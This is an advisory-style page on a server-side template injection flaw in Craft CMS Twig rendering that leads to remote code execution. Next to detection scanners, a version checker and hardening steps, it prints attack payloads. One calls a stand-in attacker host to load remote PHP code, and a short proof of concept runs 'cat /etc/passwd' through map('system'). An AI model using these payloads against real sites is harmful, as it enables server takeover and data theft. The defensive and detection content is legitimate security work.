Craft CMS, Server-Side Template Injection (SSTI), CVE-2025-XXXX (Critical)


Craft CMS versions 4.0.0-RC1 through 4.14.12 and 5.0.0-RC1 through 5.6.14 are vulnerable to a critical Server-Side Template Injection (SSTI) in Twig template rendering. An authenticated administrator can inject malicious Twig templates, leading to remote code execution (RCE) when `ALLOW_ADMIN_CHANGES` is enabled. The flaw stems from insufficient validation of template input before it is rendered, which lets the injected template reach arbitrary PHP code. Craft CMS fixed this in versions 4.14.13 and 5.6.15 by enforcing stricter template validation.

DailyCVE Form

Platform: Craft CMS
Version: 4.0.0-RC1 – 5.6.14
Vulnerability: SSTI → RCE
Severity: Critical
Date: May 5, 2025

What Undercode Says:

Exploitation:

1. Payload Injection:

{{ _self.env.setCache("ftp://attacker.net/exploit.php") }}
{{ _self.env.loadTemplate("exploit.php") }}

2. PHP Code Execution:

{{ ['id']|map('system')|join }}

Detection:

  • Log Analysis (the original pattern `{{.system(.)}}` would not match the filter-based payload above; this one matches both payload shapes, `map('system')` and `_self.env`; Craft also writes its own logs to the project's storage/logs/ directory):
    grep -rE "\{\{.*(map\s*\(\s*['\"]system['\"]|_self\.env)" /var/log/craftcms/
    
  • Template-source check (a crude pre-save hook; `$template` is the submitted template source):
    if (strpos($template, '_self') !== false) { die("SSTI Attempt"); }
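The two checks above each look for one string. As an added example (not code from the advisory or from Craft CMS), the scanner below generalises them: it decodes URL-encoded request bodies the way they appear in access logs, then matches both payload shapes the advisory shows (a PHP callable name passed to a callable-accepting Twig filter, and access to `_self.env`). The callable list and the sample lines are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed indicator list: PHP callables an attacker could hand to a Twig
# filter that accepts a callable (map/filter/reduce/sort). "system" is the one
# in the advisory's payload; the others are its usual companions.
DANGEROUS_CALLABLES = ("system", "exec", "passthru", "shell_exec", "popen", "proc_open")
_CALLABLE_ALT = "|".join(DANGEROUS_CALLABLES)

PATTERNS = {
    # {{ ['id']|map('system')|join }}  -- callable name passed to a Twig filter
    "callable_filter": re.compile(
        r'''\|\s*(?:map|filter|reduce|sort)\s*\(\s*["'](?:%s)["']''' % _CALLABLE_ALT, re.I),
    # {{ _self.env.setCache(...) }}  -- reaching the Twig environment object
    "self_env": re.compile(r"_self\s*\.\s*env\b", re.I),
}


def normalise(text):
    """Decode URL-encoded request bodies (single or double encoded) so payloads
    in access logs are matched the same way as raw template source."""
    decoded = text
    for _ in range(2):
        new = unquote_plus(decoded)
        if new == decoded:
            break
        decoded = new
    return decoded


def scan_line(line):
    """Return the names of the SSTI indicators present in one line."""
    text = normalise(line)
    return [name for name, rx in PATTERNS.items() if rx.search(text)]


def scan_lines(lines):
    """Return (line_no, indicators) for every line that matches at least one indicator."""
    hits = []
    for no, line in enumerate(lines, 1):
        found = scan_line(line)
        if found:
            hits.append((no, found))
    return hits


# Constructed sample: benign template lines, the two advisory payloads, and one
# URL-encoded access-log line carrying the map('system') payload.
SAMPLE_LINES = [
    "{{ entry.title|upper }}",
    "{{ ['id']|map('system')|join }}",
    '{{ _self.env.setCache("ftp://attacker.net/exploit.php") }}',
    "POST /admin/actions/templates/render template=%7B%7B+%5B%27id%27%5D%7Cmap%28%27system%27%29%7Cjoin+%7D%7D",
    "{{ users|map(u => u.name)|join(', ') }}",
]

if __name__ == "__main__":
    for no, found in scan_lines(SAMPLE_LINES):
        print(f"line {no}: {', '.join(found)}")
```

The arrow-function form `map(u => u.name)` is the legitimate use and does not match, because the pattern requires a quoted string where the callable goes; that is the distinction a reviewer of template changes wants flagged.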
    

Mitigation:

1. Update Immediately:

composer require craftcms/cms:^4.14.13

2. Disable Admin Changes:

// config/general.php
'allowAdminChanges' => false,

3. Web-server rule (nginx; denies direct requests for template files, and the dot must be escaped in the regex):

location ~ \.twig$ {
    deny all;
}
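Steps 1 and 2 above are easy to verify across many installs. As an added example (not code from the advisory or from Craft CMS), the script below reads the installed `craftcms/cms` version from composer.lock, compares it against the affected ranges the advisory states, and reports whether admin changes are still enabled from `ALLOW_ADMIN_CHANGES` in .env or a literal `allowAdminChanges` in config/general.php. The composer.lock and .env contents are constructed; the assumption that Craft defaults `allowAdminChanges` to true follows Craft's documentation.

```python
import json
import re

# Affected ranges as stated in the advisory (inclusive) and the fixed releases.
AFFECTED_RANGES = [("4.0.0-RC1", "4.14.12"), ("5.0.0-RC1", "5.6.14")]
FIXED = {4: "4.14.13", 5: "5.6.15"}

_VERSION_RX = re.compile(r"^v?(\d+)\.(\d+)\.(\d+)(?:-([A-Za-z]+)\.?(\d*))?$")


def parse_version(text):
    """Turn '4.14.12' or '4.0.0-RC1' into a comparable tuple. A dash-suffix
    pre-release (RC1, beta.2) sorts before the final release of the same
    number; only this simple suffix form is handled (assumption)."""
    m = _VERSION_RX.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised version: {text!r}")
    major, minor, patch, tag, num = m.groups()
    pre = (0, int(num or 0)) if tag else (1, 0)
    return (int(major), int(minor), int(patch)) + pre


def is_affected(version):
    """True when the version lies inside one of the advisory's affected ranges."""
    v = parse_version(version)
    return any(parse_version(lo) <= v <= parse_version(hi) for lo, hi in AFFECTED_RANGES)


def installed_craft_version(lock_text):
    """Read the craftcms/cms version from composer.lock JSON; None if absent."""
    for pkg in json.loads(lock_text).get("packages", []):
        if pkg.get("name") == "craftcms/cms":
            return pkg["version"].lstrip("v")
    return None


_GENERAL_RX = re.compile(r'''["']allowAdminChanges["']\s*=>\s*(true|false)''', re.I)


def admin_changes_enabled(env_text="", general_php_text=""):
    """A literal true/false in config/general.php wins; otherwise
    ALLOW_ADMIN_CHANGES from .env; otherwise Craft's default of true."""
    m = _GENERAL_RX.search(general_php_text)
    if m:
        return m.group(1).lower() == "true"
    for line in env_text.splitlines():
        line = line.strip()
        if line.startswith("ALLOW_ADMIN_CHANGES="):
            value = line.split("=", 1)[1].strip().strip("\"'").lower()
            return value in ("1", "true", "yes", "on")
    return True


def assess(lock_text, env_text="", general_php_text=""):
    """Return a list of actionable findings for one install."""
    version = installed_craft_version(lock_text)
    if version is None:
        return ["craftcms/cms not found in composer.lock"]
    findings = []
    if is_affected(version):
        fixed = FIXED[parse_version(version)[0]]
        findings.append(f"craftcms/cms {version} is in the affected range; upgrade to {fixed}")
    if admin_changes_enabled(env_text, general_php_text):
        findings.append("admin changes are enabled; set allowAdminChanges to false in production")
    return findings


# Constructed sample install: vulnerable version, admin changes still on.
SAMPLE_LOCK = json.dumps({"packages": [{"name": "craftcms/cms", "version": "5.6.14"}]})
SAMPLE_ENV = "CRAFT_ENVIRONMENT=production\nALLOW_ADMIN_CHANGES=true\n"

if __name__ == "__main__":
    for finding in assess(SAMPLE_LOCK, SAMPLE_ENV):
        print(finding)
```

Run it against the project root of each Craft install; two findings mean both the upgrade and the config change are still outstanding, one means only the remaining item is.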

Exploit PoC (For Research):

import requests
payload = "{{['cat /etc/passwd']|map('system')|join}}"
session.post("/admin/actions/templates/render", data={"template": payload})

Hardening:

  • Restrict Twig with a sandbox policy (Twig has no built-in `system` filter to remove; the payload passes PHP's `system` to the `map` filter, so the fix is an allowlist of tags, filters and functions; `$twig` is Craft's Twig environment, e.g. Craft::$app->getView()->getTwig(), and the allowlist must be tuned to what the site's templates actually use):
    $policy = new \Twig\Sandbox\SecurityPolicy(['if', 'for', 'set'], ['escape', 'join', 'upper'], [], [], ['range']);
    $twig->addExtension(new \Twig\Extension\SandboxExtension($policy, true));
    
  • Craft CMS CSP Header (browser-side defence in depth; it does not stop server-side template execution):
    header("Content-Security-Policy: script-src 'self'");
    

References / Sources:

Reported By: github.com
Extra Source Hub: Undercode
